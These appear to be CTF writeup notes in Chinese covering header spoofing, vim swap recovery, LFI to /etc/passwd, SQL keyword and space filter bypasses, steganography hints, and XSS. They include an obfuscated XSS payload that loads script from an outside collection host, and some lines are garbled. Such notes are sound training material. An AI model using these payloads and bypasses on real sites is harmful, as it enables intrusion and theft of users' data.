Writeups
Google hacking x-forwarder-for不行,換另一個Client_ip
.htaccess 不要忘記
Vim編輯文件時產生,它是隱藏文件,原名是data,swp名就是.data.swp。新建個data,vim -r data就可恢復
base64的編碼/9j/4AAQSkZJRgABAQEAYABgAAD,這樣子的,看這個格式是一張base64編碼過的圖片,郵件中傳輸圖像常常使用這種方式。
img src=”data:p_w_picpath/jpg;base64, /9j/4AAQSkZJRgABAQEAYABgAAD/….” />這樣子保存成html就可以解開了。
直接include了進來,可以使用../進行跨目錄的一些操作,包含到/etc/passwd等敏感的文件,在GPC關閉時可以使用進行截斷,造成LFI漏洞。如果GPC開啓時,就會對進行轉義。
onload=document.body.a(createElement_x_x_x_x_x_x_x_x_x(/script/.source)).src=String.fromCharCode(47,47,108,47,51,67,57,101,101,52,63,49,51,57,56,50,52,56,52,48,48);//
使用了fromCharCode編碼 //xss.sinaapp.com/3C9ee4?1398248400
jsfuck brainfuck packed (pp|rr|jj|aa)encode
(#!/usr/bin/perl -w length q defined and| #!/usr/bin/env ruby $,^$$&&@_ | $=~[];$={___:++$,$$$$:(! | ω= /`m′) ~┻━┻ //*′`*)
secure標誌是指定cookie要在https的傳輸協議中才會給帶上的,現在的訪問的是正常的http的協議,所以cookie不會被設置上,那麼肯定是順手就在發包中加上了這個cookie,試試看。也沒有什麼反應。
最後是在想display用怎麼用的時候,是一個name=value的形式,然後想到了那個actf上的 way = “H4ck_F0r_Fun!GoGoGo!,是不是也要來試試看。然後就用get方式提交 ?display= 5842b0a0df2d52533c241c6ec26089a8作爲參數。這個時候有了不一樣的回顯。
FTP 有主\被動兩種模式,開端口情況不同。
得知2121端口正是pyftpd監聽的FTP服務端口。上網搜索pyftpd歷史漏洞,找到http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073,
可知union select 空格,都被過濾掉了
union 和select 用uniunionon 和selselectect來繞過
空格可以用%09 %0A %0B %0C %0D來代替,測試發現%0B是可以繞過的
JPG 格式會有壓縮,所以不大可能基於像數的隱寫,jpg的結尾符0XFFD9來確定
有一種繞過xss過濾的方法是html轉義,(&#形式編碼)
<script>alert(1)</script> ---><script>alert(1)</script>